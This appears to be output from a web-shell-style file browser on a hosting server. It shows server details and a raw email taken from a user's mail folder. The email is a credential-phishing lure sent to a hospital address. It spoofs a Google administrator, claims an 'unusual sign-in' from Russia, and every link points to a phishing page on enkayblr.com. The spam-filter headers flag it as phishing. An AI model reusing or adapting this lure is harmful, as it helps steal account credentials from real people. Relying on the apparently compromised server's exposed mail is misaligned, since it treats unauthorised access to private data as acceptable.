PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/ithome/mail/cur/
Server: Linux host100322.itwesthosting.com 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
IP: 144.91.64.173
Choose File :

Url:
Dir : /home/ithome/mail/cur/1758023172.M484791P7822.host100322.itwesthosting.com,S=9639,W=9836:2,

Return-Path: <admin@google.com>
Delivered-To: ithome@host100322.itwesthosting.com
Received: from host100322.itwesthosting.com
	by host100322.itwesthosting.com with LMTP
	id UOK1HAROyWiOHgAAp0YrwQ
	(envelope-from <admin@google.com>)
	for <ithome@host100322.itwesthosting.com>; Tue, 16 Sep 2025 13:46:12 +0200
Return-path: <admin@google.com>
Envelope-to: info@bolnica-lipik.hr
Delivery-date: Tue, 16 Sep 2025 13:46:12 +0200
Received: from [23.105.132.195] (port=56704 helo=google.com)
	by host100322.itwesthosting.com with esmtp (Exim 4.96.2)
	(envelope-from <admin@google.com>)
	id 1uyU8R-00029H-1l
	for info@bolnica-lipik.hr;
	Tue, 16 Sep 2025 13:46:12 +0200
From: Mail Administrator <admin@google.com>
To: info@bolnica-lipik.hr
Date: 16 Sep 2025 04:46:09 -0700
Message-ID: <20250916044609.B52974235E9B984D@google.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Spam-Status: Yes, score=19.7
X-Spam-Score: 197
X-Spam-Bar: +++++++++++++++++++
X-Spam-Report: Spam detection software, running on the system "host100322.itwesthosting.com",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Mail account Unusual Sign-In Activity Your password for the
    Mail account info@bolnica-lipik.hr was changed on 9/16/2025 4:46:09 a.m.
   (GMT). If this was you, then you can safely ignore this email. Sec [...] 
 Content analysis details:   (19.7 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: enkayblr.com]
  2.5 URIBL_DBL_PHISH        Contains a Phishing URL listed in the Spamhaus
                             DBL blocklist
                             [URIs: enkayblr.com]
  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in
                             bl.spamcop.net
              [Blocked - see <https://www.spamcop.net/bl.shtml?23.105.132.195>]
  4.7 RCVD_IN_XBL            RBL: Received via a relay in Spamhaus XBL
                             [23.105.132.195 listed in zen.spamhaus.org]
  0.0 URIBL_PH_SURBL         Contains an URL listed in the PH SURBL blocklist
                             [URIs: enkayblr.com]
  1.9 URIBL_ABUSE_SURBL      Contains an URL listed in the ABUSE SURBL
                             blocklist
                             [URIs: enkayblr.com]
  1.5 SPF_SOFTFAIL           SPF: sender does not match SPF record (softfail)
  1.5 SPF_HELO_SOFTFAIL      SPF: HELO does not match SPF record (softfail)
  0.0 DKIM_ADSP_CUSTOM_MED   No valid author signature, adsp_override is
                              CUSTOM_MED
  0.0 T_MXG_EMAIL_FRAG       URI with email in fragment
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                            [23.105.132.195 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE:
                             The query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [23.105.132.195 listed in sa-accredit.habeas.com]
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  3.0 KAM_DMARC_REJECT       DKIM has Failed or SPF has failed on the
                             message and the domain has a DMARC reject
                             policy
  2.0 RDNS_NONE              Delivered to internal network by a host with no rDNS
  0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML
                             only
  1.2 NML_ADSP_CUSTOM_MED    ADSP custom_med hit, and not from a mailing
                             list
  0.0 BODY_URI_ONLY          Message body is only a URI in one line of text or
                             for an image
X-Spam-Flag: YES
Subject:  ***SPAM***  Unusual Sign-In Activity to info@bolnica-lipik.hr
X-From-Rewrite: unmodified, forwarded message

<!DOCTYPE HTML>

<html><head><title></title>
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge">
<meta name=3D"GENERATOR" content=3D"MSHTML 8.00.7601.17514"></head>
<body style=3D"margin: 0.4em;"><p><br></p><div id=3D"forwardbody1"><div><ta=
ble dir=3D"ltr">
<tbody>
<tr>
<td id=3D"v1i1" style=3D'padding: 0px; color: rgb(112, 112, 112); font-fami=
ly: "Segoe UI Semibold", "Segoe UI Bold", "Segoe UI", "Helvetica Neue Mediu=
m", Arial, sans-serif; font-size: 17px;'>Mail account</td>
</tr>
<tr>
<td id=3D"v1i2" style=3D'padding: 0px; color: rgb(38, 114, 236); font-famil=
y: "Segoe UI Light", "Segoe UI", "Helvetica Neue Medium", Arial, sans-serif=
; font-size: 41px;'>Unusual Sign-In Activity</td>
</tr>
<tr>
<td id=3D"v1i3" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
>Your password for the Mail account <a class=3D"v1link" id=3D"v1iAccount" s=
tyle=3D"color: rgb(38, 114, 236); text-decoration: none;" href=3D"mailto:a*=
*s@wizardfancydress.co.uk" rel=3D"noreferrer">info@bolnica-lipik.hr</a> was=
 changed on&nbsp;9/16/2025 4:46:09 a.m. (GMT).</td>
</tr>
<tr>
<td id=3D"v1i4" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
>If this was you, then you can safely ignore this email.</td>
</tr>
<tr>
<td id=3D"v1i5" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
>Security info used: info@bolnica-lipik.hr</td>
</tr>
<tr>
<td id=3D"v1i6" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); font=
-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'>=
Country/region: Russia</td>
</tr>
<tr>
<td id=3D"v1i7" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); font=
-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'>=
Platform: Windows</td>
</tr>
<tr>
<td id=3D"v1i8" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); font=
-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'>=
Browser: Chrome</td>
</tr>
<tr>
<td id=3D"v1i9" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); font=
-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'>=
IP address: 212.159.78.65</td>
</tr>
<tr>
<td id=3D"v1i10" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fo=
nt-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;=
'>If this wasn't you, your account has been compromised. Please follow thes=
e steps:</td>
</tr>
<tr>
<td id=3D"v1i11" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
><a class=3D"v1link" id=3D"v1iLink1" style=3D"color: rgb(38, 114, 236); tex=
t-decoration: none;" href=3D"https://enkayblr.com/wp-admin/index.html#info@=
bolnica-lipik.hr" target=3D"_blank" rel=3D"noopener noreferrer">1. Reset yo=
ur password.</a></td>
</tr>
<tr>
<td id=3D"v1i12" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
><a class=3D"v1link" id=3D"v1iLink4" style=3D"color: rgb(38, 114, 236); tex=
t-decoration: none;" href=3D"https://enkayblr.com/wp-admin/index.html#info@=
bolnica-lipik.hr" target=3D"_blank" rel=3D"noopener noreferrer">2. Review y=
our security info.</a></td>
</tr>
<tr>
<td id=3D"v1i13" style=3D'padding: 6px 0px 0px; color: rgb(42, 42, 42); fon=
t-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'=
><a class=3D"v1link" id=3D"v1iLink2" style=3D"color: rgb(38, 114, 236); tex=
t-decoration: none;" href=3D"https://enkayblr.com/wp-admin/index.html#info@=
bolnica-lipik.hr" target=3D"_blank" rel=3D"noopener noreferrer">3. Learn ho=
w to make your account more secure.</a></td>
</tr>
<tr>
<td id=3D"v1i14" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fo=
nt-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;=
'>You can also <a class=3D"v1link" id=3D"v1iLink3" style=3D"color: rgb(38, =
114, 236); text-decoration: none;" href=3D"https://enkayblr.com/wp-admin/in=
dex.html#info@bolnica-lipik.hr" target=3D"_blank" rel=3D"noopener noreferre=
r">opt out</a> or change where you receive security notifications.</td>
</tr>
<tr>
<td id=3D"v1i15" style=3D'padding: 25px 0px 0px; color: rgb(42, 42, 42); fo=
nt-family: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;=
'>Thanks,</td>
</tr>
<tr>
<td id=3D"v1i16" style=3D'padding: 0px; color: rgb(42, 42, 42); font-family=
: "Segoe UI", Tahoma, Verdana, Arial, sans-serif; font-size: 14px;'>The&nbs=
p;bolnica-lipik.hr account team</td>
</tr>
</tbody>
</table>
</div>
</div></body></html>